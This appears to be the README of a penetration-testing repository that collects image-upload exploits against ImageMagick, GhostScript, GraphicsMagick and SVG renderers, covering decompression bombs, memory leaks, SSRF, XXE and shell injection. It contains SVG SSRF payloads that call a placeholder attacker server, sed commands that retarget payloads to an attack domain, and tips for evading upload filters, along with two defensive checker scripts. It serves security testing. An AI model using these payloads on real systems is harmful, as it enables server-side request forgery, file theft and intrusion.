Image Upload Exploits
This repository contains various old image exploits (2016-2019) for known vulnerabilities in image processors. It is a compilation of files, attack vectors, and exploits that I use in penetration testing and bug bounty work.
You can also find tips, examples, and links to other useful tools in the relevant sections.
Nothing new here. The repository is based on third-party research, bug bounty disclosures, and my own experience. Links to the original publications are attached to the relevant sections.
If you have more exploits please make a pull request!
Every DNS-based and SSRF exploit uses placeholder values for the scheme, hostname, and port used for resolution; use the commands below to replace all of them. The exploits also use a subdomain (like ssrf-svg-image-href.evil.com) that indicates which bug was triggered when the lookup arrives.
Replace hostname (for DNS-based and SSRF payloads):
grep -rl 'TARGET_DOMAIN' * | xargs -i@ sed -i 's/TARGET_DOMAIN/your.attack.domain/g' @
Replace scheme (for SSRF payloads):
grep -rl 'TARGET_SCHEME://' * | xargs -i@ sed -i 's/TARGET_SCHEME:\/\//http:\/\//g' @
Replace port (for SSRF payloads):
grep -rl 'TARGET_PORT' * | xargs -i@ sed -i 's/TARGET_PORT/80/g' @
General Tips
- If the target extension is disallowed on the web server, try changing it to an allowed extension (PNG/JPG/GIF) or an allowed MIME type. Some image processors recognize the image format by its content. (Most files in this repo have a duplicate with a .jpg extension.)
- Use the default SSRF tricks: try changing the protocol (e.g. `ftp://`, `https://`, `file://`, or a UNC path `\\your-domain\share`) or the port (e.g. 53, 22, 443).
- Create an HTML page on your web server with malicious images and a malicious `favicon.ico`; some crawlers/web uploaders render HTML into some kind of preview, and the images will be processed and rendered too.
Cheatsheet
DoS
Pixel Flood
Just a typical data compression bomb. When loaded into memory, it unpacks to 4128062500 pixels. Be careful!
Links:
zTXt chunk
Yet another data compression bomb; this exploit uses the zTXt chunk, which carries zlib-compressed text. Be careful!
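Both bombs above (the pixel flood and the zTXt chunk) can be caught before a single pixel is decoded by walking the PNG chunk list. The following check is an added example, not code from this repository; the pixel and inflated-size caps are assumed policy values, and the two sample files are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_PIXELS = 50_000_000        # assumed policy: largest image we are willing to decode
MAX_TEXT_INFLATED = 1_000_000  # assumed policy: cap on the inflated size of one zTXt chunk

def _chunk(ctype, body):
    """Build a PNG chunk: length, type, data, CRC over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def inspect_png(data):
    """Walk the chunk list without decoding pixels and return
    {"width", "height", "pixels", "reasons"}; a non-empty "reasons" means reject."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, width, height, reasons = len(PNG_SIG), 0, 0, []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if len(body) != length:
            reasons.append("truncated chunk")
            break
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", body[:8])
            if width * height > MAX_PIXELS:
                reasons.append(f"declares {width * height} pixels, cap is {MAX_PIXELS}")
        elif ctype == b"zTXt":
            # keyword, NUL, compression method, then the zlib stream: inflate with a hard cap
            sep = body.find(b"\x00")
            comp = body[sep + 2:] if sep >= 0 else b""
            d = zlib.decompressobj()
            out = d.decompress(comp, MAX_TEXT_INFLATED)
            if d.unconsumed_tail or (len(out) >= MAX_TEXT_INFLATED and not d.eof):
                reasons.append(f"zTXt inflates beyond {MAX_TEXT_INFLATED} bytes")
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            break
    return {"width": width, "height": height, "pixels": width * height, "reasons": reasons}

# Constructed samples (not files from this repository): a header declaring
# 64250 x 64250 = 4128062500 pixels, and a zTXt chunk that inflates to 2 MB from a few KB.
_IHDR = lambda w, h: _chunk(b"IHDR", struct.pack(">IIBBBBB", w, h, 8, 2, 0, 0, 0))
FLOOD = PNG_SIG + _IHDR(64250, 64250) + _chunk(b"IEND", b"")
ZTXT_BOMB = (PNG_SIG + _IHDR(1, 1)
             + _chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(b"\x00" * 2_000_000))
             + _chunk(b"IEND", b""))
```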
Links:
GhostScript
GhostScript is an interpreter for PostScript. PostScript is a programming language, and most of these exploits break out of the PostScript sandbox. Vulnerabilities in GhostScript affect ImageMagick because it uses GhostScript to process PostScript-family files such as PDF, EPS, PS, and XPS. Of course, if you find an application that handles these file types without ImageMagick, you can also try these exploits against it.
Exploits
Several variants with DNS-based and timeout-based payloads and different extensions:
- Exploits for CVE-2017-8291
- Exploits for CVE-2018-16509
- Exploits for CVE-2019-6116
- Exploits for CVE-2019-14811, CVE-2019-14812, CVE-2019-14813
- Exploits for CVE-2019-10216
Links
Memory Leaks
Gifoeb (CVE-2017-15277)
Memory disclosure caused by an error in ImageMagick's GIF processing. This bug was discovered by Emil Lerner, who also created a PoC that extracts the leaked data from the resulting image. The vulnerability is often found in applications that let you upload images and then process them, for example by resizing. The amount of memory leaked is limited to 768 bytes.
You can use the 300x300 GIF image file to detect whether an application is vulnerable. If it is, you will see something like:
Then use Emil's PoC to extract the leaked memory bytes.
Links
XBM memory leak (CVE-2018-16323)
Memory disclosure caused by an error in ImageMagick's XBM processing. The conditions are the same as for CVE-2017-15277: the web application processes the image with ImageMagick, for example by resizing. The vulnerability was discovered by Fedotkin Zakhar, who also created a PoC. The amount of memory leaked is unlimited but environment-dependent.
Exploits
- Valid 500x500 XBM image
- Same as above with JPG extension
- 500x500 image with short payload
- Same as above with JPG extension
If the web application is vulnerable, the result will look something like:
Then try to recover the raw bytes using the PoC, or simply use ImageMagick:
convert result1.png result1.xbm
In result1.xbm you will see the raw memory bytes as part of the pixel array of the XBM image.
Links
SVG
SVG is a vector image format defined in XML.
SVG Basics
1. In SVG you can define links to external resources, which can lead to SSRF or local file read.
2. SVG can contain JavaScript, and if the Content-Type of the HTTP response is image/svg+xml, the JS will be executed.
3. XML? XXE!
4. If the SVG is rendered to a raster format (e.g. PNG, JPG, etc.), then 1 and 3 can lead to interesting results: you can render text files or images into the resulting image.
Exploits
Some plain SVG examples
External image
<image height="100" width="100" xlink:href="http://YOUR-SERVER.COM:80/" />
<feImage xlink:href="http://YOUR-SERVER.COM:80/" width="200" height="200"/>
External stylesheet
<?xml-stylesheet type="text/css" href="http://YOUR-SERVER.COM:80"?>
External fill source (from a HackerOne report)
<rect fill="url(http://YOUR-SERVER.COM:80)" />
Iframe. If the iframe is rendered, you can try to read files or make arbitrary requests
<foreignObject width="100" height="100">
<iframe src="http://YOUR-SERVER.COM:80"></iframe>
</foreignObject>
External CSS
<style>
@import url(http://YOUR-SERVER.COM:80/);
</style>
SVG tags that accept the xlink:href attribute
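Every shape above is an external reference the renderer will follow, so a server-side upload filter can refuse it without rendering anything. The checker below is an added example, not code from this repository: it flags any explicit scheme other than data: in href/xlink:href (so http, ftp, file and the msl: coder prefix mentioned later all count), @import/url() references, an xml-stylesheet instruction, DOCTYPE/ENTITY declarations, and script/foreignObject/iframe elements; the sample SVG is constructed here.

```python
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
ACTIVE_TAGS = {"script", "foreignObject", "iframe"}
SCHEME = re.compile(r"^\s*([a-z][a-z0-9+.-]*):", re.I)  # explicit scheme; data: is inline, others fetch
CSS_URL = re.compile(r"(?:@import|url\s*\()\s*[\"']?\s*([a-z][a-z0-9+.-]*):", re.I)  # @import / url()

def external_scheme(value):
    m = SCHEME.match(value or "")
    return m.group(1).lower() if m and m.group(1).lower() != "data" else None

def svg_findings(text):
    """Return the reasons an uploaded SVG should be refused (empty list = clean)."""
    findings = []
    if re.search(r"<!(?:DOCTYPE|ENTITY)", text, re.I):
        findings.append("DOCTYPE/ENTITY declaration")
    for m in CSS_URL.finditer(text):  # <style> bodies and presentation attributes such as fill
        if m.group(1).lower() != "data":
            findings.append(f"css reference to {m.group(1)}: URL")
    parser = ET.XMLPullParser(events=("end", "pi"))
    try:
        parser.feed(text)
        parser.close()
    except ET.ParseError as e:
        findings.append(f"malformed XML: {e}")  # refuse what the checker cannot parse
        return findings
    for event, node in parser.read_events():
        if event == "pi":
            if node.text.startswith("xml-stylesheet"):
                findings.append("xml-stylesheet processing instruction")
            continue
        tag = node.tag.rsplit("}", 1)[-1]  # strip the namespace
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr in (XLINK_HREF, "href"):
            scheme = external_scheme(node.get(attr))
            if scheme:
                findings.append(f"<{tag}> href uses {scheme}:")
    return findings

# Constructed sample (not a repository file): the external image, fill and iframe shapes above in one document.
SAMPLE = """<?xml-stylesheet type="text/css" href="http://example.invalid:80"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="10" height="10" fill="url(http://example.invalid:80)"/>
  <image height="100" width="100" xlink:href="http://example.invalid:80/"/>
  <foreignObject width="100" height="100"><iframe src="http://example.invalid:80"></iframe></foreignObject>
</svg>"""
CLEAN = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="#0f0"/></svg>'
```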
Links
- SSRF via xlink SVG, fingerprinting libraries
- SVGSalamander CVE-2017-5617, Java library for SVG handling
- Another collection of SVG SSRF payloads
- XSS via SVG, Abdullah Hussam, Paragon Initiative Enterprises bug bounty
- SSRF via xlink, floyd, Shopify bug bounty
- SSRF via fill, Alex Birsan, Rockstar Games bug bounty
ImageTragick (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)
The most famous bugs in ImageMagick. The vulnerabilities were found by Stewie and Nikolay Ermishkin. They include RCE, SSRF, file deletion, file moving, and local file read.
- Exploits: DNS resolution and sleep payloads for time-based checks
Links
GraphicsMagick File Read (CVE-2019-12921)
This vulnerability in the GraphicsMagick library was found by Fedotkin Zakhar. The bug can be exploited for arbitrary file read: if an SVG image is rendered, the text file is rendered into the resulting image too. For exploitation you need to specify the path to some image, which can be a remote path. If a remote image is unreachable from the target server, you can also check for the default images on the target system and use the local path to one of them in the exploit.
Links
Shell Injection in ImageMagick (CVE-2020-29599)
An ImageMagick vulnerability in the handling of PDF passwords. It is highly likely you will never find this bug, as only a few minor ImageMagick versions are vulnerable.
First of all, the SVG structure has an image root tag. As the parser does not enforce that the SVG tag is the root tag, IM has no problems parsing this file as an SVG. The SVG structure specifies an image URL, which uses msl:poc.svg. This tells ImageMagick to load poc.svg with the MSL coder.
Although MSL is an XML-based structure, the MSL coder does not deploy a real XML parser. It only requires that the file starts with a tag it supports. Another trick I used is present in the read tag. It is necessary to target a PDF file to trigger the vulnerability. To bypass this necessity, I specified any known local file and used the pdf: protocol handler to ensure it is treated as a PDF.
- Exploits: DNS resolution and sleep payloads for time-based checks
Links